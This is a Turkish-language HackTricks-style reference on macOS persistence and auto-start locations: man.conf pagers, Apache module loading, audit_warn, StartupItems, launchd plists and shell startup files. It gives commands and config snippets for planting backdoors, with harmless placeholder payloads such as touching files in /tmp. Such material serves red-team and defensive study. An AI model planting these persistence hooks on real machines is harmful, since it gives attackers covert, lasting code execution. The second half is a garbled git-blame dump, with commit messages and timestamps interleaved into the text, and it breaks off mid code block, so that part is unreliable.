security authorizationdb write com.asdf.asdf < /tmp/rule.plist
```
**`evaluate-mechanisms`** yetkilendirme çerçevesine dış bir mekanizmayı çağırması gerekeceğini belirtecektir. Ayrıca, **`privileged`** root tarafından yürütülmesini sağlayacaktır.

Şununla tetikleyin:
```bash
security authorize com.asdf.asdf
```
Ve sonra **personel grubunun sudo erişimi olmalıdır** (`/etc/sudoers` dosyasını okuyun doğrulamak için).

### Man.conf

Açıklama: [https://theevilbit.github.io/beyond/beyond\_0030/](https://theevilbit.github.io/beyond/beyond\_0030/)

* Kum havuzunu atlamak için kullanışlı: [🟠](https://emojipedia.org/large-orange-circle)
* Ancak root olmanız ve kullanıcının man kullanması gerekmektedir
* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)

#### Konum

* **`/private/etc/man.conf`**
* Root gerekli
* **`/private/etc/man.conf`**: Her man kullanıldığında

#### Açıklama ve Sömürü

Yapılandırma dosyası **`/private/etc/man.conf`**, man belgelendirme dosyalarını açarken kullanılacak ikili betiği gösterir. Bu nedenle yürütülecek bir arka kapı belirlenebilir, böylece kullanıcı herhangi bir belgeyi okumak için man kullandığında bir arka kapı yürütülür.

Örneğin **`/private/etc/man.conf`** içinde ayarlanmış:
```
MANPAGER /tmp/view
```
Ve ardından `/tmp/view`'i şu şekilde oluşturun:
```bash
#!/bin/zsh

touch /tmp/manconf

/usr/bin/less -s
```
### Apache2

**Açıklama**: [https://theevilbit.github.io/beyond/beyond\_0023/](https://theevilbit.github.io/beyond/beyond\_0023/)

* Kum havuzunu atlamak için faydalı: [🟠](https://emojipedia.org/large-orange-circle)
* Ancak root olmanız ve apache'nin çalışıyor olması gerekmektedir
* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)
* Httpd'nin yetkilendirmeleri yok

#### Konum

* **`/etc/apache2/httpd.conf`**
* Root gerekli
* Tetikleyici: Apache2 başlatıldığında

#### Açıklama ve Sızma

`/etc/apache2/httpd.conf` dosyasında bir modülü yüklemek için aşağıdaki gibi bir satır ekleyebilirsiniz:

{% code overflow="wrap" %}
```bash
LoadModule my_custom_module /Users/Shared/example.dylib "My Signature Authority"
```
{% endcode %}

Bu şekilde derlenmiş modülleriniz Apache tarafından yüklenecektir. Tek yapmanız gereken ya **geçerli bir Apple sertifikası ile imzalamak** ya da sisteme **yeni güvenilir bir sertifika eklemek** ve onunla **imzalamak**.

Ardından, gerektiğinde sunucunun başlatılacağından emin olmak için şunu çalıştırabilirsiniz:
```bash
sudo launchctl load -w /System/Library/LaunchDaemons/org.apache.httpd.plist
```
Dylb için kod örneği:
```objectivec
#include <stdio.h>
#include <syslog.h>

__attribute__((constructor))
static void myconstructor(int argc, const char **argv)
{
printf("[+] dylib constructor called from %s\n", argv[0]);
syslog(LOG_ERR, "[+] dylib constructor called from %s\n", argv[0]);
}
```
### BSM denetim çerçevesi

Açıklama: [https://theevilbit.github.io/beyond/beyond\_0031/](https://theevilbit.github.io/beyond/beyond\_0031/)

* Kum havuzunu atlamak için faydalı: [🟠](https://emojipedia.org/large-orange-circle)
* Ancak root olmanız, auditd'nin çalışıyor olması ve bir uyarıya neden olmanız gerekmektedir
* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)

#### Konum

* **`/etc/security/audit_warn`**
* Root gerekli
* **Tetikleyici**: Auditd bir uyarı algıladığında

#### Açıklama ve Sızma

Auditd bir uyarı algıladığında **`/etc/security/audit_warn`** betiği **çalıştırılır**. Bu nedenle kendi yükünüzü ekleyebilirsiniz.
```bash
echo "touch /tmp/auditd_warn" >> /etc/security/audit_warn
```
### Başlangıç Öğeleri

{% hint style="danger" %}
**Bu kullanım dışıdır, bu yüzden bu dizinlerde hiçbir şey bulunmamalıdır.**
{% endhint %}

**StartupItem**, ya `/Library/StartupItems/` ya da `/System/Library/StartupItems/` içinde bulunması gereken bir dizindir. Bu dizin oluşturulduğunda, içermesi gereken iki belirli dosya bulunmalıdır:

1. Bir **rc betiği**: Başlangıçta çalıştırılan bir kabuk betiği.
2. **plist dosyası**, özellikle `StartupParameters.plist` adında, çeşitli yapılandırma ayarlarını içeren.

Başlangıç işlemi tarafından bunları tanıması ve kullanması için hem rc betiğinin hem de `StartupParameters.plist` dosyasının doğru şekilde **StartupItem** dizini içine yerleştirildiğinden emin olun.

{% tabs %}
{% tab title="StartupParameters.plist" %}
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Description</key>
<string>This is a description of this service</string>
<key>OrderPreference</key>
<string>None</string> <!--Other req services to execute before this -->
<key>Provides</key>
<array>
<string>superservicename</string> <!--Name of the services provided by this file -->
</array>
</dict>
</plist>
```
{% endtab %}

{% tab title="superservisadı" %}
```bash
#!/bin/sh
. /etc/rc.common

StartService(){
touch /tmp/superservicestarted
}

StopService(){
rm /tmp/superservicestarted
}

RestartService(){
echo "Restarting"
}

RunService "$1"
```
{% endtab %}
{% endtabs %}

### ~~emond~~

{% hint style="danger" %}
Bu bileşeni macOS'ta bulamıyorum, daha fazla bilgi için writeup'a bakın
{% endhint %}

Writeup: [https://theevilbit.github.io/beyond/beyond\_0023/](https://theevilbit.github.io/beyond/beyond\_0023/)

Apple tarafından tanıtılan **emond**, geliştirilmemiş veya muhtemelen terkedilmiş gibi görünen bir günlükleme mekanizmasıdır, ancak hala erişilebilir durumda. Mac yöneticileri için özellikle faydalı olmasa da, bu belirsiz hizmet, tehdit aktörleri için hafif bir kalıcılık yöntemi olarak hizmet edebilir ve muhtemelen çoğu macOS yöneticisi tarafından fark edilmeyebilir.

Varlığından haberdar olanlar için, **emond**'un kötüye kullanımını tespit etmek kolaydır. Bu hizmetin sistem için LaunchDaemon'ı, yürütülecek betikleri tek bir dizinde arar. Bunun incelenmesi için aşağıdaki komut kullanılabilir:
```bash
ls -l /private/var/db/emondClients
```
### ~~XQuartz~~

Yazım: [https://theevilbit.github.io/beyond/beyond\_0018/](https://theevilbit.github.io/beyond/beyond\_0018/)

#### Konum

* **`/opt/X11/etc/X11/xinit/privileged_startx.d`**
* Root gereklidir
* **Tetikleyici**: XQuartz ile

#### Açıklama ve Sızma

XQuartz artık macOS'ta **kurulu değil**, bu yüzden daha fazla bilgi için yazıya bakın.

### ~~kext~~

{% hint style="danger" %}
Kext'i yüklemek bile kök olarak çok karmaşıktır, bu nedenle bunu kum havuzlarından kaçmak veya kalıcılık için düşünmeyeceğim (sadece bir açığız varsa)
{% endhint %}

#### Konum

Bir KEXT'i başlangıç öğesi olarak yüklemek için aşağıdaki konumlardan birine **yüklü olması gerekir**:

* `/System/Library/Extensions`
* OS X işletim sistemi tarafından derlenmiş KEXT dosyaları.
* `/Library/Extensions`
* 3. taraf yazılım tarafından yüklenen KEXT dosyaları

Şu anda yüklenmiş kext dosyalarını listeleyebilirsiniz:
```bash
kextstat #List loaded kext
kextload /path/to/kext.kext #Load a new one based on path
kextload -b com.apple.driver.ExampleBundle #Load a new one based on path
kextunload /path/to/kext.kext
kextunload -b com.apple.driver.ExampleBundle
```
Daha fazla bilgi için [**çekirdek uzantılarına bu bölüme bakın**](macos-security-and-privilege-escalation/mac-os-architecture/#i-o-kit-drivers).

### ~~amstoold~~

Açıklama: [https://theevilbit.github.io/beyond/beyond\_0029/](https://theevilbit.github.io/beyond/beyond\_0029/)

#### Konum

* **`/usr/local/bin/amstoold`**
* Root gereklidir

#### Açıklama ve Sömürü

Görünüşe göre `/System/Library/LaunchAgents/com.apple.amstoold.plist`'den gelen `plist` bu ikiliyi kullanıyordu ve bir XPC servisini açığa çıkarıyordu... sorun şu ki ikili mevcut değildi, bu yüzden bir şey yerleştirebilir ve XPC servisi çağrıldığında ikiliniz çağrılacaktı.

Artık macOS'ta bunu bulamıyorum.

### ~~xsanctl~~

Açıklama: [https://theevilbit.github.io/beyond/beyond\_0015/](https://theevilbit.github.io/beyond/beyond\_0015/)

#### Konum

* **`/Library/Preferences/Xsan/.xsanrc`**
* Root gereklidir
* **Tetikleyici**: Servis çalıştırıldığında (nadiren)

#### Açıklama ve sömürü

Bu betiği çalıştırmak pek yaygın değil gibi görünüyor ve macOS'ta bile bulamadım, bu yüzden daha fazla bilgi istiyorsanız yazıya bakın.

### ~~/etc/rc.common~~

{% hint style="danger" %}
**Bu modern MacOS sürümlerinde çalışmıyor**
{% endhint %}

Ayrıca buraya **başlangıçta çalıştırılacak komutlar** yerleştirmek mümkündür. Tipik bir rc.common betiği örneği:
```bash
#
# Common setup for startup scripts.
#
# Copyright 1998-2002 Apple Computer, Inc.
#

######################
# Configure the shell #
######################

#
# Be strict
#
#set -e
set -u

#
# Set command search path
#
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/libexec:/System/Library/CoreServices; export PATH

#
# Set the terminal mode
#
#if [ -x /usr/bin/tset ] && [ -f /usr/share/misc/termcap ]; then
#    TERM=$(tset - -Q); export TERM
#fi

###################
# Useful functions #
###################

#
# Determine if the network is up by looking for any non-loopback
# internet network interfaces.
#
CheckForNetwork()
{
local test

if [ -z "${NETWORKUP:=}" ]; then
test=$(ifconfig -a inet 2>/dev/null | sed -n -e '/127.0.0.1/d' -e '/0.0.0.0/d' -e '/inet/p' | wc -l)
if [ "${test}" -gt 0 ]; then
NETWORKUP="-YES-"
else
NETWORKUP="-NO-"
fi
fi
}

alias ConsoleMessage=echo

#
# Process management
#
GetPID ()
{
local program="$1"
local pidfile="${PIDFILE:=/var/run/${program}.pid}"
local     pid=""

if [ -f "${pidfile}" ]; then
pid=$(head -1 "${pidfile}")
if ! kill -0 "${pid}" 2> /dev/null; then
echo "Bad pid file $pidfile; deleting."
pid=""
rm -f "${pidfile}"
fi
fi

if [ -n "${pid}" ]; then
echo "${pid}"
return 0
else
return 1
fi
}

#
# Generic action handler
#
RunService ()
{
case $1 in
start  ) StartService   ;;
stop   ) StopService    ;;
restart) RestartService ;;
*      ) echo "$0: unknown argument: $1";;
esac
}
```
## Kalıcılık teknikleri ve araçları

* [https://github.com/cedowens/Persistent-Swift](https://github.com/cedowens/Persistent-Swift)
* [https://github.com/D00MFist/PersistentJXA](https://github.com/D00MFist/PersistentJXA)

<details>

<summary><strong>AWS hackleme konusunda sıfırdan kahraman olmaya kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

HackTricks'ı desteklemenin diğer yolları:

* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.

</details>
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								# macOS Otomatik Başlatma
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
 								<details>
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								<summary><strong>AWS hacklemeyi sıfırdan ileri seviyeye öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								HackTricks'ı desteklemenin diğer yolları:
-												arte

											
										
										
											2023-12-30 20:49:49 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'de **takip edin**.
 								* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
 								</details>
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Bu bölüm, [**Beyond the good ol' LaunchAgents**](https://theevilbit.github.io/beyond/) blog serisine dayanmaktadır. Amacı, **daha fazla Otomatik Başlatma Konumu** eklemek (mümkünse), günümüzdeki macOS'ın en son sürümüyle (13.4) **hala çalışan teknikleri belirtmek** ve gerekli olan **izinleri** belirtmektir.
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								## Kum Havuzu Atlatma
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
 								{% hint style="success" %}
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Burada, **kum havuzu atlatma** için yararlı olan başlatma konumlarını bulabilirsiniz. Bu, bir şeyi **bir dosyaya yazarak** ve bir **çok yaygın eylem**, belirli bir **zaman miktarı** veya genellikle bir kum havuzundan **kök izinleri gerektirmeden** gerçekleştirebileceğiniz bir **eylem** için **bekleyerek** basitçe yürütmenize olanak tanır.
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								{% endhint %}
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								### Launchd
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* Kum havuzu atlatma için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								* TCC Atlatma: [🔴](https://emojipedia.org/large-red-circle)
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konumlar
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
 								* **`/Library/LaunchAgents`**
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* **Tetikleyici**: Yeniden başlatma
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								* Kök izni gereklidir
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								* **`/Library/LaunchDaemons`**
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* **Tetikleyici**: Yeniden başlatma
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								* Kök izni gereklidir
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								* **`/System/Library/LaunchAgents`**
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* **Tetikleyici**: Yeniden başlatma
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								* Kök izni gereklidir
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								* **`/System/Library/LaunchDaemons`**
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* **Tetikleyici**: Yeniden başlatma
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								* Kök izni gereklidir
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								* **`~/Library/LaunchAgents`**
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* **Tetikleyici**: Yeniden oturum açma
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								* **`~/Library/LaunchDemons`**
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* **Tetikleyici**: Yeniden oturum açma
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Açıklama ve Sömürü
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								**`launchd`**, başlangıçta OX S çekirdeği tarafından yürütülen **ilk işlem** ve kapanırken sonuncusudur. Her zaman **PID 1**'e sahip olmalıdır. Bu işlem, **ASEP** **plistlerinde** belirtilen yapılandırmaları **okuyacak ve yürütecek**:
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* `/Library/LaunchAgents`: Yönetici tarafından yüklenen kullanıcı başına ajanlar
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* `/Library/LaunchDaemons`: Yönetici tarafından yüklenen sistem genelinde hizmetler
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* `/System/Library/LaunchAgents`: Apple tarafından sağlanan kullanıcı başına ajanlar.
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* `/System/Library/LaunchDaemons`: Apple tarafından sağlanan sistem genelinde hizmetler.
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Bir kullanıcı oturum açtığında, `/Users/$USER/Library/LaunchAgents` ve `/Users/$USER/Library/LaunchDemons` konumlarındaki plist'ler **oturum açan kullanıcı izinleriyle** başlatılır.
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								**Ajanlar ve hizmetler arasındaki temel fark, ajanların kullanıcı oturum açtığında yüklenmesi ve hizmetlerin sistem başlatıldığında yüklenmesidir** (çünkü ssh gibi hizmetlerin, herhangi bir kullanıcının sisteme erişmeden önce yürütülmesi gerekmektedir). Ayrıca ajanlar GUI kullanabilirken, hizmetler arka planda çalışmalıdır.
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								```xml
 								<?xml version="1.0" encoding="UTF-8"?>
 								<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN">
 								<plist version="1.0">
 								<dict>
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								<key>Label</key>
 								<string>com.apple.someidentifier</string>
 								<key>ProgramArguments</key>
 								<array>
 								<string>bash -c 'touch /tmp/launched'</string> <!--Prog to execute-->
 								</array>
 								<key>RunAtLoad</key><true/> <!--Execute at system startup-->
 								<key>StartInterval</key>
 								<integer>800</integer> <!--Execute each 800s-->
 								<key>KeepAlive</key>
 								<dict>
 								<key>SuccessfulExit</key></false> <!--Re-execute if exit unsuccessful-->
 								<!--If previous is true, then re-execute in successful exit-->
 								</dict>
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								</dict>
 								</plist>
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Bazı durumlarda, **kullanıcı oturum açmadan önce bir ajanın çalıştırılması gerekebilir**, bunlara **PreLoginAgents** denir. Örneğin, bu, oturum açılırken destekleyici teknoloji sağlamak için kullanışlıdır. Bunlar ayrıca `/Library/LaunchAgents` dizininde de bulunabilir (bir örnek için [**buraya**](https://github.com/HelmutJ/CocoaSampleCode/tree/master/PreLoginAgents) bakın).
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								{% hint style="info" %}
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Yeni Daemon veya Ajan yapılandırma dosyaları, **bir sonraki yeniden başlatmadan sonra veya** `launchctl load <hedef.plist>` **kullanılarak yüklenecektir**. Ayrıca, `.plist` uzantısız dosyaları da `launchctl -F <dosya>` ile yüklemek mümkündür (ancak bu plist dosyaları otomatik olarak yeniden başlatmadan sonra yüklenmeyecektir).\
 								`launchctl unload <hedef.plist>` ile **boşaltmak** da mümkündür (bu işaret ettiği işlem sonlandırılacaktır).
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Bir **Ajanın** veya **Daemon'ın** **çalışmasını engelleyen** bir **geçersiz kılma** gibi **herhangi bir şeyin olmadığından emin olmak için** şunu çalıştırın: `sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.smdb.plist`
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								{% endhint %}
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Mevcut kullanıcı tarafından yüklenen tüm ajanları ve daemonları listele:
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								```bash
 								launchctl list
 								```
-												GITBOOK-4146: change request with no subject merged in GitBook

											
										
										
											2023-11-02 16:52:21 +00:00
+								{% hint style="warning" %}
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Eğer bir plist dosyası bir kullanıcıya aitse, hatta daemon sistem genelindeki klasörlerde olsa bile, **görev kullanıcı olarak** ve kök olarak değil yürütülecektir. Bu bazı ayrıcalık yükseltme saldırılarını önleyebilir.
-												GITBOOK-4146: change request with no subject merged in GitBook

											
										
										
											2023-11-02 16:52:21 +00:00
+								{% endhint %}
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								### kabuk başlangıç dosyaları
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Açıklama: [https://theevilbit.github.io/beyond/beyond\_0001/](https://theevilbit.github.io/beyond/beyond\_0001/)\
 								Açıklama (xterm): [https://theevilbit.github.io/beyond/beyond\_0018/](https://theevilbit.github.io/beyond/beyond\_0018/)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* TCC Atlatma: [✅](https://emojipedia.org/check-mark-button)
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* Ancak bu dosyaları yükleyen bir kabuk yürüten TCC atlatması olan bir uygulama bulmanız gerekmektedir
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konumlar
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4226: change request with no subject merged in GitBook

											
										
										
											2023-12-30 00:49:26 +00:00
+								* **`~/.zshrc`, `~/.zlogin`, `~/.zshenv.zwc`**, **`~/.zshenv`, `~/.zprofile`**
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* **Tetikleyici**: zsh ile bir terminal aç
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								* **`/etc/zshenv`, `/etc/zprofile`, `/etc/zshrc`, `/etc/zlogin`**
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* **Tetikleyici**: zsh ile bir terminal aç
 								* Kök gereklidir
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								* **`~/.zlogout`**
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* **Tetikleyici**: zsh ile bir terminali kapat
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								* **`/etc/zlogout`**
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* **Tetikleyici**: zsh ile bir terminali kapat
 								* Kök gereklidir
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* Muhtemelen daha fazlası: **`man zsh`**
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								* **`~/.bashrc`**
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* **Tetikleyici**: bash ile bir terminal aç
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* `/etc/profile` (çalışmadı)
 								* `~/.profile` (çalışmadı)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								* `~/.xinitrc`, `~/.xserverrc`, `/opt/X11/etc/X11/xinit/xinitrc.d/`
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* **Tetikleyici**: xterm ile tetiklenmesi beklenir, ancak **kurulu değil** ve kurulduktan sonra bile bu hata alınır: xterm: `DISPLAY is not set`
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								#### Açıklama ve Sömürü
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								`zsh` veya `bash` gibi bir kabuk ortamı başlatıldığında, **belirli başlangıç dosyaları çalıştırılır**. macOS şu anda varsayılan kabuk olarak `/bin/zsh` kullanmaktadır. Bu kabuk, Terminal uygulaması başlatıldığında veya bir cihaz SSH ile erişildiğinde otomatik olarak erişilir. macOS'ta ayrıca `bash` ve `sh` de bulunmaktadır, ancak kullanılmak için açıkça çağrılması gerekmektedir.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								`man zsh` ile okuyabileceğimiz zsh'in man sayfası, başlangıç dosyalarının uzun bir açıklamasına sahiptir.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```bash
 								# Example executino via ~/.zshrc
